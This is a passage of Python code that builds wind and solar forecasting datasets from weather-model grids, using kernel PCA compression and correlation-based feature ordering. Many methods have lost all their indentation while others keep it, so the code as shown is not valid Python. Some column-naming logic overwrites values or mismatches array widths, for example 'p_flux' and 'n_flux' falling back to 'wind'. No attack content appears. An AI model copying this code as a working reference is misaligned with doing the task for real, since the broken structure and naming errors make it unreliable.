    (plus '_prev'/'_next' neighbors for the primary variable and a 'dates'
    vector) to stacked arrays, and X_3d stacks all variables per timestamp.
    Missing files or unreadable timestamps are skipped silently.
    """
    X = np.array([])
    X_3d = np.array([])
    data_var = dict()
    # The primary variable (WS for wind, Flux for pv) also gets the previous
    # and next hourly snapshots as separate channels.
    for var in variables:
        if ((var == 'WS') and (model_type=='wind')) or ((var == 'Flux') and (model_type=='pv')):
            data_var[var + '_prev'] = X
            data_var[var] = X
            data_var[var + '_next'] = X
        else:
            data_var[var] = X
    data_var['dates'] = X
    fname = os.path.join(path_nwp_project, nwp_model + '_' + t.strftime('%d%m%y') + '.pickle')
    if os.path.exists(fname):
        nwps = joblib.load(fname)
        # First pass: find one usable timestamp from which to derive the
        # lat/long index windows covering the requested area.
        for date in pdates:
            try:
                nwp = nwps[date]
                if len(nwp['lat'].shape) == 1:
                    nwp['lat'] = nwp['lat'][:, np.newaxis]
                if len(nwp['long'].shape) == 1:
                    nwp['long'] = nwp['long'][np.newaxis, :]
                lats = (np.where((nwp['lat'][:,0]>=areas[0][0]) & (nwp['lat'][:,0]<=areas[1][0])))[0]
                longs = (np.where((nwp['long'][0,:]>=areas[0][1]) & (nwp['long'][0,:]<=areas[1][1])))[0]
                break
            except:
                # NOTE(review): bare except keeps scanning on any failure.
                continue
        # Second pass: stack the cropped fields for every timestamp that has
        # data in the previous, current and next hourly snapshots.
        try:
            for date in pdates:
                nwp = nwps[date]
                date = pd.to_datetime(date, format='%d%m%y%H%M')
                nwp_prev = nwps[(date - pd.DateOffset(hours=1)).strftime('%d%m%y%H%M')]
                nwp_next = nwps[(date + pd.DateOffset(hours=1)).strftime('%d%m%y%H%M')]
                if check_empty_nwp(nwp, nwp_next, nwp_prev, variables):
                    data_var['dates'] = np.hstack((data_var['dates'], date))
                    x_2d = np.array([])
                    for var in sorted(variables):
                        if ((var == 'WS') and (model_type=='wind')) or ((var == 'Flux') and (model_type=='pv')):
                            data_var[var + '_prev'] = stack_2d(data_var[var + '_prev'], nwp_prev[var][np.ix_(lats, longs)], compress)
                            data_var[var] = stack_2d(data_var[var], nwp[var][np.ix_(lats, longs)], compress)
                            data_var[var + '_next'] = stack_2d(data_var[var + '_next'], nwp_next[var][np.ix_(lats, longs)], compress)
                            x_2d = stack_2d(x_2d, nwp_prev[var][np.ix_(lats, longs)], compress)
                            x_2d = stack_2d(x_2d, nwp[var][np.ix_(lats, longs)], compress)
                            x_2d = stack_2d(x_2d, nwp_next[var][np.ix_(lats, longs)], compress)
                        else:
                            data_var[var] = stack_2d(data_var[var], nwp[var][np.ix_(lats, longs)], compress)
                            x_2d = stack_2d(x_2d, nwp[var][np.ix_(lats, longs)], compress)
                    X_3d = stack_2d(X_3d, x_2d, False)
        except:
            # NOTE(review): bare except abandons the whole day on any error,
            # possibly returning partially-filled arrays — confirm intended.
            pass
    print(t.strftime('%d%m%y%H%M'), ' extracted')
    return (data_var, X_3d, t.strftime('%d%m%y%H%M'))
class dataset_creator_PCA():
def __init__(self, project, data=None, njobs=1, test=False, dates=None):
self.data = data
self.isfortest = test
self.project_name= project['_id']
self.static_data = project['static_data']
self.path_nwp_project = self.static_data['pathnwp']
self.path_data = self.static_data['path_data']
self.areas = self.static_data['areas']
self.area_group = self.static_data['area_group']
self.nwp_model = self.static_data['NWP_model']
self.nwp_resolution = self.static_data['NWP_resolution']
self.location = self.static_data['location']
if self.nwp_resolution == 0.05:
self.compress = True
else:
self.compress = False
self.njobs = njobs
self.variables = self.static_data['data_variables']
self.create_logger()
if not self.data is None:
self.check_dates()
elif not dates is None:
self.dates = dates
    def create_logger(self):
        """Attach a per-project-group file logger as ``self.logger``.

        The log file lives next to the NWP directory and is opened in append
        mode.
        """
        # NOTE(review): a new FileHandler is added on every call; repeated
        # construction of this class duplicates log lines — confirm intended.
        self.logger = logging.getLogger('log_' + self.static_data['project_group'] + '.log')
        self.logger.setLevel(logging.INFO)
        handler = logging.FileHandler(os.path.join(os.path.dirname(self.path_nwp_project), 'log_' + self.static_data['project_group'] + '.log'), 'a')
        handler.setLevel(logging.INFO)
        # create a logging format
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        handler.setFormatter(formatter)
        # add the handlers to the logger
        self.logger.addHandler(handler)
def check_dates(self):
start_date = pd.to_datetime(self.data.index[0].strftime('%d%m%y'), format='%d%m%y')
end_date = pd.to_datetime(self.data.index[-1].strftime('%d%m%y'), format='%d%m%y')
dates = pd.date_range(start_date, end_date)
data_dates = pd.to_datetime(np.unique(self.data.index.strftime('%d%m%y')), format='%d%m%y')
dates = [d for d in dates if d in data_dates]
self.logger.info('Dates is checked. Number of time samples %s', str(len(dates)))
self.dates = pd.DatetimeIndex(dates)
    def get_3d_dataset(self):
        """Extract and stack daily NWP fields for all checked dates.

        For each day, hours +24..+47 relative to the day start that exist in
        the data index are extracted in parallel via ``stack_daily_nwps``,
        then the per-day results are concatenated. The stacked per-variable
        dict and the 3-D tensor are persisted as pickles (with a '_test'
        suffix when ``self.isfortest``) and returned.
        """
        dates_stack = []
        for t in self.dates:
            pdates = pd.date_range(t + pd.DateOffset(hours=24), t + pd.DateOffset(hours=47), freq='H')
            dates = [dt.strftime('%d%m%y%H%M') for dt in pdates if dt in self.data.index]
            dates_stack.append(dates)
        # Non-dict areas means a single farm; otherwise the group bounding box
        # is used for extraction.
        if not isinstance(self.areas, dict):
            nwp = stack_daily_nwps(self.dates[0], dates_stack[0], self.path_nwp_project, self.nwp_model, self.areas, self.variables, self.compress, self.static_data['type'])
            nwp_daily = Parallel(n_jobs=self.njobs)(delayed(stack_daily_nwps)(self.dates[i], pdates, self.path_nwp_project, self.nwp_model,
                                                                              self.areas, self.variables, self.compress, self.static_data['type'])
                                                    for i, pdates in enumerate(dates_stack))
        else:
            nwp = stack_daily_nwps(self.dates[0], dates_stack[0], self.path_nwp_project, self.nwp_model, self.area_group,
                                   self.variables, self.compress, self.static_data['type'])
            nwp_daily = Parallel(n_jobs=self.njobs)(
                delayed(stack_daily_nwps)(self.dates[i], pdates, self.path_nwp_project, self.nwp_model,
                                          self.area_group, self.variables, self.compress, self.static_data['type'])
                for i, pdates in enumerate(dates_stack))
        X = np.array([])
        data_var = dict()
        for var in self.variables:
            if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
                data_var[var+'_prev'] = X
                data_var[var] = X
                data_var[var+'_next'] = X
            else:
                data_var[var] = X
        data_var['dates'] = X
        X_3d = np.array([])
        # Concatenate the per-day stacks, skipping days with no usable data.
        for arrays in nwp_daily:
            nwp = arrays[0]
            x_2d = arrays[1]
            if x_2d.shape[0]!=0:
                for var in nwp.keys():
                    if var != 'dates':
                        data_var[var] = stack_3d(data_var[var], nwp[var])
                    else:
                        data_var[var] = np.hstack((data_var[var], nwp[var]))
                X_3d = stack_3d(X_3d, x_2d)
            self.logger.info('NWP data stacked for date %s', arrays[2])
        if self.isfortest:
            joblib.dump(data_var, os.path.join(self.path_data, 'nwps_3d_test.pickle'))
            joblib.dump(X_3d, os.path.join(self.path_data, 'dataset_cnn_test.pickle'))
        else:
            joblib.dump(data_var, os.path.join(self.path_data, 'nwps_3d.pickle'))
            joblib.dump(X_3d, os.path.join(self.path_data, 'dataset_cnn.pickle'))
        self.logger.info('NWP stacked data saved')
        return data_var, X_3d
    def create_sample(self):
        # Placeholder kept for API symmetry with other dataset creators.
        pass
    def train_PCA(self, data, components, level):
        """Fit a kernel-PCA model for *level* and persist it to disk.

        The data is MinMax-scaled, the RBF gamma is selected by a 3-fold grid
        search over 20 log-spaced values using the reconstruction-error scorer
        ``my_scorer``, and the scaler plus best estimator are dumped to
        ``kpca_<level>.pickle`` in the project's data directory.
        """
        scaler = MinMaxScaler()
        data_scaled = scaler.fit_transform(data)
        param_grid = [{
            "gamma": np.logspace(-3, 0, 20),
        }]
        kpca = KernelPCA(n_components=components, fit_inverse_transform=True, n_jobs=self.njobs)
        grid_search = GridSearchCV(kpca, param_grid, cv=3, scoring=my_scorer, n_jobs=self.njobs)
        grid_search.fit(data_scaled)
        kpca = grid_search.best_estimator_
        fname = os.path.join(self.path_data, 'kpca_' + level + '.pickle')
        joblib.dump({'scaler':scaler, 'kpca':kpca}, fname)
def PCA_transform(self, data, components, level):
fname = os.path.join(self.path_data, 'kpca_' + level + '.pickle')
if not os.path.exists(fname):
self.train_PCA(data, components, level)
models = joblib.load(fname)
data_scaled = models['scaler'].transform(data)
data_compress = models['kpca'].transform(data_scaled)
return data_compress
def make_dataset_res(self):
if self.isfortest:
if not os.path.exists(os.path.join(self.path_data, 'nwps_3d_test.pickle')) or not os.path.exists(os.path.join(self.path_data, 'dataset_cnn_test.pickle')):
data, X_3d = self.get_3d_dataset()
else:
data = joblib.load(os.path.join(self.path_data, 'nwps_3d_test.pickle'))
X_3d = joblib.load(os.path.join(self.path_data, 'dataset_cnn_test.pickle'))
else:
if not os.path.exists(os.path.join(self.path_data, 'nwps_3d.pickle')) or not os.path.exists(os.path.join(self.path_data, 'dataset_cnn.pickle')):
data, X_3d = self.get_3d_dataset()
else:
data = joblib.load(os.path.join(self.path_data, 'nwps_3d.pickle'))
X_3d = joblib.load(os.path.join(self.path_data, 'dataset_cnn.pickle'))
data_path = self.path_data
if not isinstance(self.areas, dict):
self.dataset_for_single_farm(data, data_path)
else:
dates_stack = []
for t in self.dates:
pdates = pd.date_range(t + pd.DateOffset(hours=25), t + pd.DateOffset(hours=48), freq='H')
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates if dt in self.data.index]
dates_stack.append(dates)
flag = False
for i, pdates in enumerate(dates_stack):
t= self.dates[i]
fname = os.path.join(self.path_nwp_project, self.nwp_model + '_' + t.strftime('%d%m%y') + '.pickle')
if os.path.exists(fname):
nwps = joblib.load(fname)
for date in pdates:
try:
nwp = nwps[date]
if len(nwp['lat'].shape) == 1:
nwp['lat'] = nwp['lat'][:, np.newaxis]
if len(nwp['long'].shape) == 1:
nwp['long'] = nwp['long'][np.newaxis, :]
lats = (np.where((nwp['lat'][:, 0] >= self.area_group[0][0]) & (nwp['lat'][:, 0] <= self.area_group[1][0])))[0]
longs = (np.where((nwp['long'][0, :] >= self.area_group[0][1]) & (nwp['long'][0, :] <= self.area_group[1][1])))[0]
lats_group = nwp['lat'][lats]
longs_group = nwp['long'][:, longs]
flag = True
break
except:
continue
if flag:
break
self.dataset_for_multiple_farms(data, self.areas, lats_group, longs_group)
def dataset_for_single_farm(self, data, data_path):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat(
[dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour', 'month'])])
for var in self.variables:
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = np.transpose(data[var + '_prev'],[0, 2, 1])
X0_level0 = X0[:, 2, 2]
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = np.transpose(data[var + '_next'],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'flux' if var=='Flux' else 'wind'
var_sort = 'fl' if var=='Flux' else 'ws'
col = ['p_' + var_name] + ['n_' + var_name] + [var_name]
col = col + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
X = np.hstack((X0_level0.reshape(-1, 1), X2_level0.reshape(-1, 1), X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1,1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud' if var=='Cloud' else 'direction'
var_sort = 'cl' if var=='Cloud' else 'wd'
col = [var_name] + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
X = np.hstack((X1_level1.reshape(-1, 1), X1_level3d, X1_level3u, X1_level4d
, X1_level4u))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X2 = np.transpose(data[var],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'Temp' if var == 'Temperature' else 'wind'
var_sort = 'tp' if var == 'Temperature' else 'ws'
col = [var_name]
X = X2_level0
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
dataset_X = dataset_X
dataset_y = self.data.loc[dataset_X.index].to_frame()
dataset_y.columns = ['target']
if self.isfortest:
ind = joblib.load(os.path.join(data_path, 'dataset_columns_order.pickle'))
columns = dataset_X.columns[ind]
dataset_X = dataset_X[columns]
dataset_X.to_csv(os.path.join(self.path_data, 'dataset_X_test.csv'))
dataset_y.to_csv(os.path.join(self.path_data, 'dataset_y_test.csv'))
self.logger.info('Successfully dataset created for Evaluation for %s', self.project_name)
else:
corr = []
for f in range(dataset_X.shape[1]):
corr.append(np.abs(np.corrcoef(dataset_X.values[:, f], dataset_y.values.ravel())[1, 0]))
ind = np.argsort(np.array(corr))[::-1]
columns = dataset_X.columns[ind]
dataset_X = dataset_X[columns]
joblib.dump(ind, os.path.join(data_path, 'dataset_columns_order.pickle'))
dataset_X.to_csv(os.path.join(self.path_data, 'dataset_X.csv'))
dataset_y.to_csv(os.path.join(self.path_data, 'dataset_y.csv'))
self.logger.info('Successfully dataset created for training for %s', self.project_name)
def dataset_for_multiple_farms(self, data, areas, lats_group, longs_group):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat([dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour','month'])])
for var in self.variables:
for area_name, area in areas.items():
if len(area)>1:
lats = (np.where((lats_group[:, 0] >= area[0, 0]) & (lats_group[:, 0] <= area[1, 0])))[0]
longs = (np.where((longs_group[0, :] >= area[0, 1]) & (longs_group[0, :] <= area[1, 1])))[0]
else:
lats = (np.where((lats_group[:, 0] >= area[0]) & (lats_group[:, 0] <= area[2])))[0]
longs = (np.where((longs_group[0, :] >= area[1]) & (longs_group[0, :] <= area[3])))[0]
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = data[var + '_prev'][:, lats, :][:, :, longs]
X0 = X0.reshape(-1, X0.shape[1] * X0.shape[2])
level = var + '_prev_' + area_name
self.logger.info('Begin PCA training for %s', level)
X0_compressed = self.PCA_transform(X0, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = data[var + '_next'][:, lats, :][:, :, longs]
X2 = X2.reshape(-1, X2.shape[1] * X2.shape[2])
level = var + '_next_' + area_name
self.logger.info('Begin PCA training for %s', level)
X2_compressed = self.PCA_transform(X2, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'flux_' + area_name if var=='Flux' else 'wind_' + area_name
var_sort = 'fl_' + area_name if var=='Flux' else 'ws_' + area_name
col = ['p_' + var_name + '.' + str(i) for i in range(3)]
col += ['n_' + var_name + '.' + str(i) for i in range(3)]
col += [var_name + '.' + str(i) for i in range(9)]
X = np.hstack((X0_compressed, X2_compressed, X1_compressed))
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif var in {'WD', 'Cloud'}:
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 9, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'cloud_' + area_name if var=='Cloud' else 'direction_' + area_name
var_sort = 'cl_' + area_name if var=='Cloud' else 'wd_' + area_name
col = [var_name + '.' + str(i) for i in range(9)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type']=='pv')):
X1 = data[var][:, lats, :][:, :, longs]
X1 = X1.reshape(-1, X1.shape[1] * X1.shape[2])
level = var + area_name
self.logger.info('Begin PCA training for %s', level)
X1_compressed = self.PCA_transform(X1, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
var_sort = 'tp_' + area_name if var == 'Temperature' else 'ws_' + area_name
col = [var_name + '.' + str(i) for i in range(3)]
X = X1_compressed
dataset_X = pd.concat([dataset_X, pd.DataFrame(X, index=data['dates'], columns=col)], axis=1)
else:
continue
for var in self.variables:
if ((var == 'WS') and (self.static_data['type'] == 'wind')) or (
(var == 'Flux') and (self.static_data['type'] == 'pv')):
col = []
col_p = []
col_n = []
for area_name, area in areas.items():
var_name = 'flux_' + area_name if var == 'Flux' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
col_p += ['p_' + var_name + '.' + str(i) for i in range(3)]
col_n += ['n_' + var_name + '.' + str(i) for i in range(3)]
var_name = 'flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
var_name = 'p_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_p].mean(axis=1)
var_name = 'n_flux' if var == 'Flux' else 'wind'
dataset_X[var_name] = dataset_X[col_n].mean(axis=1)
elif var in {'WD', 'Cloud'}:
col = []
for area_name, area in areas.items():
var_name = 'cloud_' + area_name if var == 'Cloud' else 'direction_' + area_name
col += [var_name + '.' + str(i) for i in range(9)]
var_name = 'cloud' if var == 'Cloud' else 'direction'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
elif (var in {'Temperature'}) or ((var == 'WS') and (self.static_data['type'] == 'pv')):
col = []
for area_name, area in areas.items():
var_name = 'Temp_' + area_name if var == 'Temperature' else 'wind_' + area_name
col += [var_name + '.' + str(i) for i in range(3)]
var_name = 'Temp' if var == 'Temperature' else 'wind'
dataset_X[var_name] = dataset_X[col].mean(axis=1)
dataset_y = self.data.loc[dataset_X.index].to_frame()
dataset_y.columns = ['target']
if self.isfortest:
ind = joblib.load(os.path.join(self.path_data, 'dataset_columns_order.pickle'))
columns = dataset_X.columns[ind]
dataset_X = dataset_X[columns]
dataset_X.to_csv(os.path.join(self.path_data, 'dataset_X_test.csv'))
dataset_y.to_csv(os.path.join(self.path_data, 'dataset_y_test.csv'))
self.logger.info('Successfully dataset created for Evaluation for %s', self.project_name)
else:
corr = []
for f in range(dataset_X.shape[1]):
corr.append(np.abs(np.corrcoef(dataset_X.values[:, f], dataset_y.values.ravel())[1, 0]))
ind = np.argsort(np.array(corr))[::-1]
columns = dataset_X.columns[ind]
dataset_X = dataset_X[columns]
joblib.dump(ind, os.path.join(self.path_data, 'dataset_columns_order.pickle'))
dataset_X.to_csv(os.path.join(self.path_data, 'dataset_X.csv'))
dataset_y.to_csv(os.path.join(self.path_data, 'dataset_y.csv'))
self.logger.info('Successfully dataset created for training for %s', self.project_name)
def make_dataset_res_offline(self, utc=False):
def datetime_exists_in_tz(dt, tz):
try:
dt.tz_localize(tz)
return True
except:
return False
data, X_3d = self.get_3d_dataset_offline(utc)
if not isinstance(self.areas, dict):
X = self.dataset_for_single_farm_offline(data)
else:
dates_stack = []
for t in self.dates:
pdates = pd.date_range(t + pd.DateOffset(hours=24), t + pd.DateOffset(hours=47), freq='H')
dates = [dt.strftime('%d%m%y%H%M') for dt in pdates]
dates_stack.append(dates)
flag = False
for i, pdates in enumerate(dates_stack):
t= self.dates[i]
fname = os.path.join(self.path_nwp_project, self.nwp_model + '_' + t.strftime('%d%m%y') + '.pickle')
if os.path.exists(fname):
nwps = joblib.load(fname)
for date in pdates:
try:
nwp = nwps[date]
if len(nwp['lat'].shape) == 1:
nwp['lat'] = nwp['lat'][:, np.newaxis]
if len(nwp['long'].shape) == 1:
nwp['long'] = nwp['long'][np.newaxis, :]
lats = (np.where((nwp['lat'][:, 0] >= self.area_group[0][0]) & (nwp['lat'][:, 0] <= self.area_group[1][0])))[0]
longs = (np.where((nwp['long'][0, :] >= self.area_group[0][1]) & (nwp['long'][0, :] <= self.area_group[1][1])))[0]
lats_group = nwp['lat'][lats]
longs_group = nwp['long'][:, longs]
flag = True
break
except:
continue
if flag:
break
X = self.dataset_for_multiple_farms_offline(data, self.areas, lats_group, longs_group)
return X, X_3d
    def get_3d_dataset_offline(self, utc):
        """Stack daily NWP grids for all dates without using on-disk caches.

        Returns a tuple ``(data_var, X_3d)`` where ``data_var`` maps variable
        names (plus ``'dates'``) to stacked arrays and ``X_3d`` is the stacked
        CNN input produced by ``stack_daily_nwps``.
        """
        def datetime_exists_in_tz(dt, tz):
            # True if `dt` can be localized to `tz` (filters out times that
            # do not exist because of DST transitions).
            try:
                dt.tz_localize(tz)
                return True
            except:
                return False
        dates_stack = []
        for dt in self.dates:
            if utc:
                # Hours 25..48 presumably select the day-ahead horizon of each
                # base date — TODO confirm against the NWP download pipeline.
                pdates = pd.date_range(dt + pd.DateOffset(hours=25), dt + pd.DateOffset(hours=48), freq='H')
                dates = [t.strftime('%d%m%y%H%M') for t in pdates]
                dates_stack.append(dates)
            else:
                # Local-time path: drop non-existent local times, then convert
                # Europe/Athens wall-clock hours to UTC before formatting.
                pdates = pd.date_range(dt + pd.DateOffset(hours=25), dt + pd.DateOffset(hours=48), freq='H')
                indices = [i for i, t in enumerate(pdates) if datetime_exists_in_tz(t, tz=timezone('Europe/Athens'))]
                pdates = pdates[indices]
                pdates = pdates.tz_localize(timezone('Europe/Athens'))
                pdates = pdates.tz_convert(timezone('UTC'))
                dates = [dt.strftime('%d%m%y%H%M') for dt in pdates]
                dates_stack.append(dates)
        if not isinstance(self.areas, dict):
            # Single area: warm-up call, then stack each day in parallel.
            nwp = stack_daily_nwps(self.dates[0], dates_stack[0], self.path_nwp_project, self.nwp_model, self.areas,
                                   self.variables, self.compress, self.static_data['type'])
            nwp_daily = Parallel(n_jobs=self.njobs)(
                delayed(stack_daily_nwps)(self.dates[i], pdates, self.path_nwp_project, self.nwp_model,
                                          self.areas, self.variables, self.compress, self.static_data['type'])
                for i, pdates in enumerate(dates_stack))
        else:
            # Multiple areas: use the enclosing area group instead.
            nwp = stack_daily_nwps(self.dates[0], dates_stack[0], self.path_nwp_project, self.nwp_model,
                                   self.area_group,
                                   self.variables, self.compress, self.static_data['type'])
            nwp_daily = Parallel(n_jobs=self.njobs)(
                delayed(stack_daily_nwps)(self.dates[i], pdates, self.path_nwp_project, self.nwp_model,
                                          self.area_group, self.variables, self.compress, self.static_data['type'])
                for i, pdates in enumerate(dates_stack))
        # Seed every output key with an empty array before accumulation;
        # the primary variable gets previous/current/next-hour slots.
        X = np.array([])
        data_var = dict()
        for var in self.variables:
            if ((var == 'WS') and (self.static_data['type'] == 'wind')) or (
                    (var == 'Flux') and (self.static_data['type'] == 'pv')):
                data_var[var + '_prev'] = X
                data_var[var] = X
                data_var[var + '_next'] = X
            else:
                data_var[var] = X
        data_var['dates'] = X
        X_3d = np.array([])
        # Accumulate each day's arrays; days with empty CNN input are skipped.
        for arrays in nwp_daily:
            nwp = arrays[0]
            x_2d = arrays[1]
            if x_2d.shape[0] != 0:
                for var in nwp.keys():
                    if var != 'dates':
                        data_var[var] = stack_3d(data_var[var], nwp[var])
                    else:
                        data_var[var] = np.hstack((data_var[var], nwp[var]))
                X_3d = stack_3d(X_3d, x_2d)
                self.logger.info('NWP data stacked for date %s', arrays[2])
        return data_var, X_3d
def dataset_for_single_farm_offline(self, data):
dataset_X = pd.DataFrame()
if self.static_data['type'] == 'pv':
hours = [dt.hour for dt in data['dates']]
months = [dt.month for dt in data['dates']]
dataset_X = pd.concat(
[dataset_X, pd.DataFrame(np.stack([hours, months]).T, index=data['dates'], columns=['hour', 'month'])])
for var in self.variables:
if ((var == 'WS') and (self.static_data['type']=='wind')) or ((var == 'Flux') and (self.static_data['type']=='pv')):
X0 = np.transpose(data[var + '_prev'],[0, 2, 1])
X0_level0 = X0[:, 2, 2]
X1 = np.transpose(data[var],[0, 2, 1])
X1_level1 = X1[:, 2, 2]
ind = [[1, j] for j in range(1, 4)] + [[i, 1] for i in range(2, 4)]
ind = np.array(ind)
X1_level3d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_down'
self.logger.info('Begin PCA training for %s', level)
X1_level3d = self.PCA_transform(X1_level3d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[2, 3], [3, 2], [3, 3]]
ind = np.array(ind)
X1_level3u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_mid_up'
self.logger.info('Begin PCA training for %s', level)
X1_level3u = self.PCA_transform(X1_level3u, 2, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[0, j] for j in range(5)] + [[i, 0] for i in range(1, 5)]
ind = np.array(ind)
X1_level4d = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_down'
self.logger.info('Begin PCA training for %s', level)
X1_level4d = self.PCA_transform(X1_level4d, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
ind = [[4, j] for j in range(1, 5)] + [[i, 4] for i in range(1, 4)]
ind = np.array(ind)
X1_level4u = np.hstack([X1[:, indices[0], indices[1]].reshape(-1, 1) for indices in ind])
level = var + '_curr_out_up'
self.logger.info('Begin PCA training for %s', level)
X1_level4u = self.PCA_transform(X1_level4u, 3, level)
self.logger.info('Successfully PCA transform for %s', level)
X2 = np.transpose(data[var + '_next'],[0, 2, 1])
X2_level0 = X2[:, 2, 2]
var_name = 'flux' if var=='Flux' else 'wind'
var_sort = 'fl' if var=='Flux' else 'ws'
col = ['p_' + var_name] + ['n_' + var_name] + [var_name]
col = col + [var_sort + '_l1.' + str(i) for i in range(3)] + [var_sort + '_l2.' + str(i) for i in
range(2)]
col = col + [var_sort + '_l3d.' + str(i) for i in range(3)] + [var_sort + '_l3u.' + str(i) for i in
range(3)]
